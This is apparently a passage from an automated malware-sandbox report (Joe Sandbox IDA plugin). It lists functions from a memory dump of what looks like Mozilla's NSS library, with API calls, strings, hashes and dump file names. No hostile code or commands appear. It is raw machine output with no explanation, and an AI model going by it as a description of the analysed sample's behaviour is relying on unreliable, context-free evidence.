Part of subcall function 6C5A14C0: EnterCriticalSection.KERNEL32 ref: 6C5A14F5
Part of subcall function 6C5A14C0: PR_Unlock.NSS3 ref: 6C5A150D

PORT_ArenaAlloc_Util.NSS3(?,-00000007), ref: 6C5B300B

Part of subcall function 6C5A10C0: TlsGetValue.KERNEL32(?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A10F3
Part of subcall function 6C5A10C0: EnterCriticalSection.KERNEL32(?,?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A110C
Part of subcall function 6C5A10C0: PL_ArenaAllocate.NSS3(?,?,?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A1141
Part of subcall function 6C5A10C0: PR_Unlock.NSS3(?,?,?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A1182
Part of subcall function 6C5A10C0: TlsGetValue.KERNEL32(?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A119C

SECOID_FindOIDByTag_Util.NSS3(00000010), ref: 6C5B302A

Part of subcall function 6C5A0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C5A08B4

Part of subcall function 6C58C3D0: PK11_ImportPublicKey.NSS3(?,?,00000000), ref: 6C58C45D
Part of subcall function 6C58C3D0: TlsGetValue.KERNEL32 ref: 6C58C494
Part of subcall function 6C58C3D0: EnterCriticalSection.KERNEL32(?), ref: 6C58C4A9
Part of subcall function 6C58C3D0: PR_Unlock.NSS3(?), ref: 6C58C4F4

Strings

<+[l, xrefs: 6C5B2FD0

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Value$ArenaCriticalEnterSectionUnlockUtil$Alloc_AllocateErrorFindImportK11_Mark_PublicTag_
String ID: <+[l
API String ID: 2538134263-3001719016
Opcode ID: 595581cd8a3e58213a728435827faa4a7978b5385ddb469e9c4028bda8901334
Instruction ID: d18cafc18d7a9b429737dbbbaeac10e6343f13bae39f7a50c819cf83f686a1e4
Opcode Fuzzy Hash: 595581cd8a3e58213a728435827faa4a7978b5385ddb469e9c4028bda8901334
Instruction Fuzzy Hash: F511EBB6B00108EBDB008E65DC00A9B7BD99FC4268F194134E91CE7781EB72ED16C791

Function 6C60CC70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 6C60CD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C60CC7B), ref: 6C60CD7A
Part of subcall function 6C60CD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C60CD8E
Part of subcall function 6C60CD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C60CDA5
Part of subcall function 6C60CD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C60CDB8

PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6C60CCB5
memcpy.VCRUNTIME140(6C6A14F4,6C6A02AC,00000090), ref: 6C60CCD3
memcpy.VCRUNTIME140(6C6A1588,6C6A02AC,00000090), ref: 6C60CD2B

Part of subcall function 6C529AC0: socket.WSOCK32(?,00000017,6C5299BE), ref: 6C529AE6
Part of subcall function 6C529AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6C5299BE), ref: 6C529AFC

Part of subcall function 6C530590: closesocket.WSOCK32(6C529A8F,?,?,6C529A8F,00000000), ref: 6C530597

Strings

Ipv6_to_Ipv4 layer, xrefs: 6C60CCB0

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
String ID: Ipv6_to_Ipv4 layer
API String ID: 1231378898-412307543
Opcode ID: 9ba7a884378caf7d78f81a95c8ac0c61966129fdc6857f31aa3e95cfbc26854d
Instruction ID: 4ce96674321f504ec5fd56cc942b2dde7468dc673435542c5f36dda0a99e3045
Opcode Fuzzy Hash: 9ba7a884378caf7d78f81a95c8ac0c61966129fdc6857f31aa3e95cfbc26854d
Instruction Fuzzy Hash: BD11A5F1B00250DFDB049FEBEC8674A3BA89786618F601125E4068BB41E731E8148BDE

Function 6C558850 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000028,00000000,?,?,6C560715), ref: 6C558859
PR_NewLock.NSS3 ref: 6C558874

Part of subcall function 6C6098D0: calloc.MOZGLUE(00000001,00000084,6C530936,00000001,?,6C53102C), ref: 6C6098E5

PL_InitArenaPool.NSS3(-00000008,NSS,00000800,00000008), ref: 6C55888D

Strings

NSS, xrefs: 6C558887

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: calloc$ArenaInitLockPool
String ID: NSS
API String ID: 2230817933-3870390017
Opcode ID: 4445d76a38c797fd1625727be331d6208567168a592256fd62e26881d2620c97
Instruction ID: de646caaaf0c5e75eec7ca0119f074972a76ab6f19b129dd8029de0e770abce5
Opcode Fuzzy Hash: 4445d76a38c797fd1625727be331d6208567168a592256fd62e26881d2620c97
Instruction Fuzzy Hash: 9BF0F6B2E8162077F31015696C06F8775989F9175EF440833E90CA3F82EF55992982F7

Function 6C60B860 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 41COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000116BB,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,6C5FA4E2), ref: 6C60B8C6

Strings

%s at line %d of [%.10s], xrefs: 6C60B8BF
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C60B8B0
database corruption, xrefs: 6C60B8BA

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: 00d91ecf059352b9a38ea72280f129acc86ca7364d428c9ce765b2a3535b3ddb
Instruction ID: f0b183aeedca4a6b2cd5ac68404c5c22c10c9b5d391123755e9f15c75ac07e40
Opcode Fuzzy Hash: 00d91ecf059352b9a38ea72280f129acc86ca7364d428c9ce765b2a3535b3ddb
Instruction Fuzzy Hash: DE01F926A4815069D310CB7A5D84D937FACAF8531574B01C9FA546F2B3E612C801C7F9

Function 6C4D7F90 Relevance: 6.2, APIs: 4, Instructions: 223COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6C4D81DF
LeaveCriticalSection.KERNEL32(?), ref: 6C4D8239
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C4D8255
sqlite3_free.NSS3(00000000), ref: 6C4D8260

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: CriticalSection$EnterLeavememcpysqlite3_free
String ID:
API String ID: 1525636458-0
Opcode ID: 3e43dc74b20d6a4a546ee968f6dab8a6c4e316ef5b19b0fdcd904794e88c7e0f
Instruction ID: d62ce6d43d712f7ed69d9fbf518915e00e6157f5ba87233816eeec25f39d94ba
Opcode Fuzzy Hash: 3e43dc74b20d6a4a546ee968f6dab8a6c4e316ef5b19b0fdcd904794e88c7e0f
Instruction Fuzzy Hash: AB91CE31A01208CBEB05EFE2E898FBDB7B1BF46305F16102AD4169B640DB357955CB85

Function 6C5B1D60 Relevance: 6.1, APIs: 4, Instructions: 141memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6C5B1D8F

Part of subcall function 6C5A14C0: TlsGetValue.KERNEL32 ref: 6C5A14E0
Part of subcall function 6C5A14C0: EnterCriticalSection.KERNEL32 ref: 6C5A14F5
Part of subcall function 6C5A14C0: PR_Unlock.NSS3 ref: 6C5A150D

PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C5B1DA6

Part of subcall function 6C5A10C0: TlsGetValue.KERNEL32(?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A10F3
Part of subcall function 6C5A10C0: EnterCriticalSection.KERNEL32(?,?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A110C
Part of subcall function 6C5A10C0: PL_ArenaAllocate.NSS3(?,?,?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A1141
Part of subcall function 6C5A10C0: PR_Unlock.NSS3(?,?,?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A1182
Part of subcall function 6C5A10C0: TlsGetValue.KERNEL32(?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A119C

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C5B1E13
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C5B1ED0

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: ArenaUtil$Value$CriticalEnterSectionUnlock$Alloc_AllocateArena_FreeItem_Mark_
String ID:
API String ID: 84796498-0
Opcode ID: c36eee4a9c2b4ced0d69e3e054b5d7d9736fce8dc1349a149cdd2588963fe7ef
Instruction ID: eb9abec48c9d1224747b04348c060d798562136be860c30b749d49e160de711e
Opcode Fuzzy Hash: c36eee4a9c2b4ced0d69e3e054b5d7d9736fce8dc1349a149cdd2588963fe7ef
Instruction Fuzzy Hash: 21517875A00309CFDB00CF99CC94BAEBBB6BF89308F144529E81AAB750D731E945CB90

Function 6C604FF0 Relevance: 6.1, APIs: 4, Instructions: 123COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000,00000000,?,?,00000001,?,6C4E85D2,00000000,?,?), ref: 6C604FFD
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C60500C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6050C8
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6050D6

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: _byteswap_ulong
String ID:
API String ID: 4101233201-0
Opcode ID: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
Instruction ID: 596715f8203f01665bd523206e719910a0d8f6d3e115642494e7e13b1eae79e4
Opcode Fuzzy Hash: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
Instruction Fuzzy Hash: 924180B2A402158BDB18CF18DCD179AB7E1BF4431871D466DD84ADBB02E379E891CB89

Function 6C52FFA0 Relevance: 6.1, APIs: 4, Instructions: 118COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3(00000000,?,?,?,6C52FDFE), ref: 6C52FFAD

Part of subcall function 6C4CCA30: EnterCriticalSection.KERNEL32(?,?,?,6C52F9C9,?,6C52F4DA,6C52F9C9,?,?,6C4F369A), ref: 6C4CCA7A
Part of subcall function 6C4CCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C4CCB26

memset.VCRUNTIME140(00000000,00000000,00000008,00000000,?,?,?,6C52FDFE), ref: 6C52FFDF
EnterCriticalSection.KERNEL32(?,?,?,?,00000000,?,?,?,6C52FDFE), ref: 6C53001C
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,6C52FDFE), ref: 6C53006F

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: CriticalSection$EnterLeave$memsetsqlite3_initialize
String ID:
API String ID: 2358433136-0
Opcode ID: e12b669a81f4c7af06e4725ccdf2b9cc25b09e31d7d40944fcda65653d47c2e7
Instruction ID: f8b9fe7e68234261c38005dbed5e0fadf0973b2715a02c1c27e52cf7a3493f2f
Opcode Fuzzy Hash: e12b669a81f4c7af06e4725ccdf2b9cc25b09e31d7d40944fcda65653d47c2e7
Instruction Fuzzy Hash: 1C41C171B012259BDB08DFA6ECC5ABE7775FB86304F04102AD80A97700EB39A911CBA5

Function 6C65A860 Relevance: 6.1, APIs: 4, Instructions: 111COMMON

Download Yara Rule

APIs

Part of subcall function 6C65A690: calloc.MOZGLUE(00000001,00000044,?,?,?,?,6C65A662), ref: 6C65A69E
Part of subcall function 6C65A690: PR_NewCondVar.NSS3(?), ref: 6C65A6B4

PR_IntervalNow.NSS3 ref: 6C65A8C6
EnterCriticalSection.KERNEL32(?), ref: 6C65A8EB
_PR_MD_UNLOCK.NSS3(?), ref: 6C65A944
PR_SetPollableEvent.NSS3(?), ref: 6C65A94F

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: CondCriticalEnterEventIntervalPollableSectioncalloc
String ID:
API String ID: 811965633-0
Opcode ID: 360efc61156ebd9809ac93824ea696579614e4a82d0272f057466a4e8c7bf116
Instruction ID: ecc3e6c9a5505927a5d593a0d670ed19ea8f1423fb0ed5b8322cd55fd1176306
Opcode Fuzzy Hash: 360efc61156ebd9809ac93824ea696579614e4a82d0272f057466a4e8c7bf116
Instruction Fuzzy Hash: C3415BB4A01A12DFC704CF29C580966FBF5FF49318765852AD449CBB12E731E860CFA4

Function 6C617DE0 Relevance: 6.1, APIs: 4, Instructions: 108COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C617E10
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C617EA6
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C617EB5
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6C617ED8

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: _byteswap_ulong
String ID:
API String ID: 4101233201-0
Opcode ID: 68fd819e4aa8e36df1224ea11687829a8446297eaaca2911829ad9927b1d0bc6
Instruction ID: 4d8966f9ee77a6a54ac5365f41cc2ef4ad0688c80107f1ca5615e6dc70692d6d
Opcode Fuzzy Hash: 68fd819e4aa8e36df1224ea11687829a8446297eaaca2911829ad9927b1d0bc6
Instruction Fuzzy Hash: 5531B5B1A041118FDB04CF0CD89099ABBE2FF8831872B8169D85C9BB11EB75EC56CBD5

Function 6C5CDF00 Relevance: 6.1, APIs: 4, Instructions: 106COMMON

Download Yara Rule

APIs

Part of subcall function 6C553090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C56AE42), ref: 6C5530AA
Part of subcall function 6C553090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C5530C7
Part of subcall function 6C553090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C5530E5
Part of subcall function 6C553090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C553116
Part of subcall function 6C553090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C55312B
Part of subcall function 6C553090: PK11_DestroyObject.NSS3(?,?), ref: 6C553154
Part of subcall function 6C553090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C55317E

SECKEY_CopyPrivateKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C5CDBBD), ref: 6C5CDFCF
SECKEY_DestroyPrivateKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5CDFEE

Part of subcall function 6C5686D0: PK11_Authenticate.NSS3(?,00000001,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6C568716
Part of subcall function 6C5686D0: TlsGetValue.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6C568727
Part of subcall function 6C5686D0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C56873B
Part of subcall function 6C5686D0: PR_Unlock.NSS3(?), ref: 6C56876F
Part of subcall function 6C5686D0: PR_SetError.NSS3(00000000,00000000), ref: 6C568787

Part of subcall function 6C58F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C58F854
Part of subcall function 6C58F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C58F868
Part of subcall function 6C58F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C58F882
Part of subcall function 6C58F820: free.MOZGLUE(04C483FF,?,?), ref: 6C58F889
Part of subcall function 6C58F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C58F8A4
Part of subcall function 6C58F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C58F8AB
Part of subcall function 6C58F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C58F8C9
Part of subcall function 6C58F820: free.MOZGLUE(280F10EC,?,?), ref: 6C58F8D0

SECKEY_DestroyPublicKey.NSS3(00000000,?,?,6C5CDBBD), ref: 6C5CDFFC
PR_SetError.NSS3(FFFFE013,00000000,?,?,6C5CDBBD), ref: 6C5CE007

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Utilfree$CriticalSection$DeleteDestroy$Arena_CopyErrorK11_Private$AlgorithmAlloc_ArenaAuthenticateEnterFreeItem_ObjectPublicTag_UnlockValuememset
String ID:
API String ID: 3730430729-0
Opcode ID: 0a6d67f4cee6f445d9034d2142c1bb520bd40de0ce43f2a935ef7ce8a573dfd6
Instruction ID: f28d7d3aaf10f3e6e05cf0c8720b104b6500ccffb1542e676fb979b8fcf7b377
Opcode Fuzzy Hash: 0a6d67f4cee6f445d9034d2142c1bb520bd40de0ce43f2a935ef7ce8a573dfd6
Instruction Fuzzy Hash: C231E9B1B0020197D7119EB99CC5AAB72B8AF9530CF450139E90AD7B12FB31D918C3E3

Function 6C546C50 Relevance: 6.1, APIs: 4, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C546C8D
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C546CA9
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C546CC0
SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6C668FE0), ref: 6C546CFE

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Util$Alloc_Arena$EncodeItem_memset
String ID:
API String ID: 2370200771-0
Opcode ID: 89a880b1ca9ec6d2a6817f61b54ae350aef0d58a321cc39e43100b8c8c47a66d
Instruction ID: db6613f603d48c304d09c8e123aa3ba6465571e434752ee3b98d2986d7490aae
Opcode Fuzzy Hash: 89a880b1ca9ec6d2a6817f61b54ae350aef0d58a321cc39e43100b8c8c47a66d
Instruction Fuzzy Hash: 75317CB5A002169FEB08CF65CC91ABFBBF5EF89348B10842DD905E7710EB719905CBA0

Function 6C654F00 Relevance: 6.1, APIs: 4, Instructions: 101fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000003,00000000,?,?,00000000), ref: 6C654F5D
free.MOZGLUE(?), ref: 6C654F74
free.MOZGLUE(?), ref: 6C654F82
GetLastError.KERNEL32 ref: 6C654F90

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
